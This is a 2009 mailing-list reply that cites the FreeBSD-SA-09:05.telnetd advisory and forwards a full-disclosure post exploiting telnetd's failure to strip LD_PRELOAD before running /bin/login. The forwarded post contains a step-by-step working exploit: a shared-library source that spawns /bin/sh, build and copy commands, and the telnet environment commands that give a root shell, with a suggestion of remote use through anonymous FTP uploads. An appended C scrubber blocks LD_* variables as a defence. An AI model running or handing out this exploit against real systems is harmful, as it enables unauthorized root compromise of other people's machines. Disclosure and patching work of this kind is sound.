Re: Fw: [Full-disclosure] FreeBSD zeroday

From: Bernd Walter <ticso(at)cicely7.cicely.de>
Date: Thu, 19 Feb 2009 12:27:27 +0100

FreeBSD-SA-09:05.telnetd

On Wed, Feb 18, 2009 at 05:10:21PM +0000, Daniel C. Dowse wrote:
>
>
> Begin forwarded message:
>
> Date: Sat, 14 Feb 2009 03:46:07 +0100
> From: Kingcope Kingcope <kcope2(at)googlemail.com>
> To: full-disclosure(at)lists.grok.org.uk
> Subject: [Full-disclosure] FreeBSD zeroday
>
>
> FreeBSD (7.0-RELEASE) telnet daemon local privilege escalation -
> And possible remote root code execution.
>
> There is a rather big bug in the current FreeBSD telnetd daemon.
> The environment is not properly sanitized when executing /bin/login,
> which leads to a (possible) remote root hole.
>
> The telnet protocol allows passing environment variables inside the
> telnet traffic and assigning them on the other side of the TCP connection.
> The telnet daemon of FreeBSD does not check for LD_* (like LD_PRELOAD)
> environment variables prior to executing /bin/login.
> So passing an environment variable with the identifier LD_PRELOAD and
> the value of a precompiled library that is on the filesystem of the
> victim's box and that includes malicious code is possible.
> When /bin/login is executed with the user id and group id 0 ('root') it preloads
> the library that was set by the remote connection through a telnet environment
> definition and executes it.
> It is unlikely that this bug can be exploited remotely, but it is not impossible.
> An attacker could e.g. upload a malicious library using ftp (including anonymous
> ftp users), nfs, smb or any other (file) transfer protocol.
> One scenario to exploit the bug remotely would be an ftp server running beside
> the telnet daemon, also serving anonymous users with write access. Then the
> attacker would upload the malicious library and define the LD_PRELOAD
> variable to something similar to /var/ftp/mallib.so to gain remote root access.
>
> Here comes the actual exploit which can be executed with standard UNIX tools.
> Paste this into a file using your favorite text editor:
> ---snip-----
> # FreeBSD telnetd local/remote privilege escalation/code execution
> # remote root only when accessible ftp or similar available
> # tested on FreeBSD 7.0-RELEASE
> # by Kingcope/2009
>
> #include <unistd.h>
> #include <stdio.h>
> #include <sys/types.h>
> #include <stdlib.h>
>
> void _init() {
> FILE *f;
> setenv("LD_PRELOAD", "", 1);
> system("echo ALEX-ALEX;/bin/sh");
> }
> ---snip-----
>
> Then we compile this stuff.
>
> ---snip-----
> #gcc -o program.o -c program.c -fPIC
> #gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
> ---snip-----
>
> Then we copy the file to a known location (local root exploit)
>
> ---snip-----
> #cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
> ---snip-----
>
> ...or we upload the library through any other available attack vector.
> After that we telnet to the remote or local FreeBSD telnet daemon,
> having set the LD_PRELOAD environment variable to the known location
> as a telnet option beforehand.
>
> ---snip-----
> #telnet
> >auth disable SRA
> >environ define LD_PRELOAD /tmp/libno_ex.so.1.0
> >open target
> ---snip-----
> ALEX-ALEX
> #ROOTSHELL
>
> This will give us an immediate (probably remote) root shell.
> This exploit is only verified on a FreeBSD 7.0-RELEASE fresh install
> with telnetd enabled. Other versions of FreeBSD may also be affected;
> OpenBSD and NetBSD were not tested but MAY contain the same bug for
> historic reasons.
>
> Signed,
> Kingcope[nikolaos rangos]/2009
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> --
> I am online, therefore I am
>
>
> To Unsubscribe: send mail to majordomo(at)de.FreeBSD.org
> with "unsubscribe de-bsd-questions" in the body of the message

-- 
B.Walter <bernd@bwct.de> http://www.bwct.de
Modbus/TCP Ethernet I/O modules, ARM-based FreeBSD computers and much more.
Received on Thu 19 Feb 2009 - 12:27:42 CET
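The defensive counterpart to the post above, as an added example that is not part of this thread and not the FreeBSD-SA-09:05 patch: the scrub step a telnetd-like daemon has to run over peer-supplied NEW-ENVIRON entries before it execs /bin/login, so that loader-controlling variables never reach a root-privileged child. The blocked-prefix list (only LD_, which covers LD_PRELOAD and LD_LIBRARY_PATH) is an assumption, the sample environment is constructed, and the function names env_entry_blocked, sanitize_env, env_len and free_env are mine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Illustrative environment scrubber (added example, not the telnetd code).
 * Prefixes that must never reach the dynamic linker of a privileged child.
 * Assumption: LD_ is enough for ld-elf.so; extend the list for other loaders.
 */
static const char *const blocked_prefixes[] = { "LD_", NULL };

/* Return 1 if a "NAME=VALUE" entry must be dropped before exec, else 0.
 * Entries with no '=' or with an empty name are malformed and dropped too. */
int env_entry_blocked(const char *entry)
{
    const char *eq = strchr(entry, '=');
    if (eq == NULL || eq == entry)
        return 1;
    for (size_t i = 0; blocked_prefixes[i] != NULL; i++) {
        size_t n = strlen(blocked_prefixes[i]);
        if (strncmp(entry, blocked_prefixes[i], n) == 0)
            return 1;
    }
    return 0;
}

/* Number of entries in a NULL-terminated environment array. */
size_t env_len(char *const envp[])
{
    size_t n = 0;
    while (envp[n] != NULL)
        n++;
    return n;
}

/* Free an array produced by sanitize_env(). */
void free_env(char **envp)
{
    if (envp == NULL)
        return;
    for (size_t i = 0; envp[i] != NULL; i++)
        free(envp[i]);
    free(envp);
}

/* Plain copy of a string (avoids relying on strdup's feature macros). */
static char *dup_entry(const char *s)
{
    size_t len = strlen(s) + 1;
    char *p = malloc(len);
    if (p != NULL)
        memcpy(p, s, len);
    return p;
}

/* Build a NULL-terminated copy of envp with blocked entries removed.
 * Returns NULL on allocation failure; the caller frees with free_env(). */
char **sanitize_env(char *const envp[])
{
    size_t n = env_len(envp);
    char **out = calloc(n + 1, sizeof(*out));   /* zeroed: always terminated */
    if (out == NULL)
        return NULL;
    size_t k = 0;
    for (size_t i = 0; i < n; i++) {
        if (env_entry_blocked(envp[i]))
            continue;
        out[k] = dup_entry(envp[i]);
        if (out[k] == NULL) {
            free_env(out);      /* out[k] is NULL, so the loop stops there */
            return NULL;
        }
        k++;
    }
    out[k] = NULL;
    return out;
}

/* Constructed sample: what a peer could ship through the ENVIRON option. */
char *const sample_peer_env[] = {
    "TERM=xterm",
    "LD_PRELOAD=/tmp/libno_ex.so.1.0",   /* the vector described in the post */
    "USER=guest",
    "LD_LIBRARY_PATH=/tmp",
    "BROKEN",                            /* malformed: no '=' */
    NULL
};

int main(void)
{
    char **clean = sanitize_env(sample_peer_env);
    if (clean == NULL)
        return 1;
    /* This is the array that would be handed to execve("/bin/login", ...). */
    for (size_t i = 0; clean[i] != NULL; i++)
        printf("keep: %s\n", clean[i]);
    free_env(clean);
    return 0;
}
```

Build with `cc -Wall -o scrub scrub.c` and run it; only TERM and USER survive. The same check can equally be applied at option-negotiation time, rejecting an LD_* definition the moment it arrives, which also gives you a log line to alert on; the advisory named in the subject is the authoritative description of what the shipped fix does.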
